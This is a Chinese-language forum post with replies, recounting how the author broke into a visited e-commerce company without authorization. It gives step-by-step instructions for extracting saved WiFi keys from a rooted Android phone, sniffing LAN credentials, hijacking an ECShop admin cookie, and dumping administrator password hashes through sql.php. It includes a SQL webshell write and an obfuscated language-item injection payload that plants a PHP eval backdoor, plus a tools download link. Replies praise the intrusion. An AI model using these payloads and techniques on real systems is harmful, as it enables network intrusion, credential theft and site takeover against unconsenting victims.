用户
搜索
  • TA的每日心情

    2018-3-2 07:59
  • 签到天数: 8 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋-核心白帽

    Rank: 4

    27

    主题

    274

    帖子

    4160

    魔法币
    收听
    0
    粉丝
    133
    注册时间
    2017-4-15

    i春秋认证春秋文阁i春秋签约作者

    发表于 2017-10-14 16:11:18 492349916
    欢迎大家加入QQ群:417360103,一起交流、学习、搞事!

    前言:
    故事发生在前两天,我们去参观工业园区内一家电商公司。
    去参观他们公司的时候,我说要用下无线网,他们技术说密码就是他们的网站域名,我一脸懵逼表示我不知道域名,然后对方接过我手机给我连上了他们wifi。
    然后就有了后面的故事。


    0x01 邪恶的想法
    在回来的时候,我注意到,他们公司在二楼,在楼下wifi信号也还好,然后我心中萌生了一个邪恶的想法。(๑*◡*๑)
    为了掩人耳目,我回公司带上我笔记本开车再次来到他们楼下(在一个园区里很近)


    熄火后我打开笔记本,准备连接他们wifi,那么问题来了,我蹭网的时候,密码是他们技术给我输入的,我不知道密码啊?
    然鹅,这都不是事,哈哈。(小兄弟看你骨骼惊奇,这个姿势我就免费传授与你吧,希望能助你拯救世界一臂之力。)


    0x02 获取wifi密码
    打开手机上的RootExplorer,切换到根目录。(注意:手机可能需要root后才能安装rootexplorer)
    打开根目录下的data/misc/wifi/wpa_supplicant.conf
    该文件是用来储存wifi连接信息的,包括ssid、psk等等信息。
    打开后你会发现,刚刚连接的wifi密码什么的都在里面了。

    1weifi密码.jpg


    0x03 信息嗅探
    笔记本连上wifi后,我在命令行下打开嗅探工具开始嗅探。
    注意:该工具需要安装WinPcap运行库才能正常运行。
    以下是工具的使用参数
    [AppleScript] 纯文本查看 复制代码
    xx.exe -idx 1 -ip 192.168.1.2-192.168.1.254 -port 80 -logfilter “+POST ,+GET ,+username,+password” -save_a save.log


    几分钟以后,我们发现抓取到很多数据包。


    2数据包抓取.jpg




    因为生成的记录文件比较大,我们用notepad++打开。
    ctrf+f查找关键词:password、username、cookie等等敏感关键词。
    通过查找我发现局域网下有人在登录ecshop系统的后台,虽然没抓到密码,但是我们抓到了cookie。

    3抓到的cookie.jpg


    0x04 cookie欺骗
    现在我们打开cookie修改工具,输入他后台地址,然后点击进入,会获取到一个未登录的cookie。


    4未登录的cookie.jpg


    然后把抓到的cookie复制到工具里面,点击右边的强制修改,提示修改完成后成功进入后台。


    5登录成功.jpg




    0x05 sql写shell
    进入后台后才发现,这应该是个子账号,只拥有上传商品的权限。
    数据库管理下有个数据库备份,想通过新建一个会员,会员名称设置成一句话,然后备份数据库拿shell的,但是发现会员管理也被权限了。
    尝试在admin/后面加上sql.php,发现竟然有sql查询权限,明明在数据库管理下没看到有这个选项啊?难道只隐藏了选项,但是还有访问权限?


    6没有sql权限.jpg




    不管了,既然可以执行sql,那么我们先获取下网站路径,然后直接sql写shell试试。


    7sql查询.jpg




    访问域名/api/cron.php报错出得出以下路径。


    8暴路径.jpg




    然后执行sql命令写shell。
    [SQL] 纯文本查看 复制代码
    select '<?php @eval($_POST[cmd])?>' into outfile '/www/web/xxxxxx/public_html/log.php'

    脸真黑,报错了,尝试了多种写入方式都以失败告终。


    9sql报错.jpg

    0x06 权限突破
    经历了各种碰壁之后,突然灵机一动,这不是可以查询数据库吗?直接查admin所在表不就出数据了?


    于是说干就干,sql查询框输入以下命令
    [SQL] 纯文本查看 复制代码
    select * from ecs_admin_user



    10爆出管理员账号.jpg


    成功查询出所有管理员账号,第一个就是超级用户,拿到md5后直接去解密,拿到明文。٩(๑❛ᴗ❛๑)۶




    0x07 换管理员账号拿shell
    拿到超级用户的账号密码后,我们重新登录后台,输入账号密码。
    因为是超级用户,已经拥有所有权限,我们找到左侧的语言项编辑,然后在右边输入"用户信息"(没有引号),然后搜索。
    把搜索出来的"用户信息"修改成以下代码,然后保存。
    [AppleScript] 纯文本查看 复制代码
    用户信息${${fputs(fopen(base64_decode(aWNxLnBocA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}


    11语言项编辑.jpg




    然后我们访问 域名/user.php 会在网站根目录下生成一个icq.php的一句话文件,密码x


    12拿到shell.jpg




    好了,写完了,我滚了......
    各位大爷如果感觉还可以的话给个回复,如果感觉很一般的话也给个回复,谢谢各位大爷。

    写在最后:办公网络最好和访客网络隔离,另外工具回复可见。
    请注意:工具来源于网络,安全性请自行在虚拟机下测试。
    链接: https://pan.baidu.com/s/1geLs0Cj 密码: 8948

    欢迎大家加入QQ群:556040588,一起交流、学习、搞事!


    评分

    参与人数 2魔法币 +6 收起 理由
    Veng + 1 工具下载地址失效了
    脚本小白 + 5 工具下载地址失效了,麻烦大佬换一下.

    查看全部评分

    本帖被以下淘专辑推荐:

    ------在下名为菜逼,阁下请多指教。
    ------博客:www.jasonx.cc
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六
    使用道具 举报 回复
    发表于 2018-10-12 14:11:19
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六
    使用道具 举报 回复
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六
    使用道具 举报 回复
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六
    使用道具 举报 回复
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六
    使用道具 举报 回复

    我什么都不服1,我就服你这种人,虽然我是个网络新手,但是阻挡不了我对你们这种人的崇拜,老铁,我会向你靠拢,等着我。一直在学习,从没中断过,骗子也hao,什么也阻挡不了我们这群游走在黑暗中的一只手,老铁,我顶你。我会超越你
    使用道具 举报 回复
    Fryflykid 发表于 2017-10-15 10:54
    想问一下有木有一种防范是每个人的链接都是独立的?互不干扰的

    每一个人独立的话不太清楚,不过你可以设置访客的wifi和办公的wifi不在一个网段就行。
    ------在下名为菜逼,阁下请多指教。
    ------博客:www.jasonx.cc
    使用道具 举报 回复
    wedchild 发表于 2017-10-19 11:36
    就是不知道那个arp的工具动静大不大怕被打死

    就算他有防护软件,并且触发了报警,他知道我在哪里吗?哈哈。
    我躲在车里,手握着jj,想要给你,一个大惊喜。
    ------在下名为菜逼,阁下请多指教。
    ------博客:www.jasonx.cc
    使用道具 举报 回复
    发表于 2017-10-14 16:31:41
    感谢分享!
    使用道具 举报 回复
    发表于 2017-10-14 16:32:27
    沙发
    使用道具 举报 回复
    发表于 2017-10-14 16:34:43
    ------在下名为菜逼,阁下请多指教。
    ------博客:www.jasonx.cc
    使用道具 举报 回复
    发表于 2017-10-14 16:35:43
    阔仪~很好!很耐死...
    使用道具 举报 回复
    很强,嗞瓷
    使用道具 举报 回复
    发表于 2017-10-14 17:48:49
    很好                        
    使用道具 举报 回复
    发表于 2017-10-14 18:03:16
    66666观看大佬
    使用道具 举报 回复
    发表于 2017-10-14 18:05:32

    感谢分享!
    使用道具 举报 回复
    发表于 2017-10-14 18:27:56
                   
    使用道具 举报 回复
    发表于 2017-10-14 18:40:53
    看看楼主的高见。
    使用道具 举报 回复
    发表于 2017-10-14 18:44:29
    感谢分享
    使用道具 举报 回复
    发表于 2017-10-14 19:11:45
    666666666666666
    使用道具 举报 回复
    发表于 2017-10-14 19:38:54
    不错   
    使用道具 举报 回复
    晨星之曦 i春秋-核心白帽 ←这个小白在努力变强
    22#
    发表于 2017-10-14 19:51:47
    66666666666666666
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册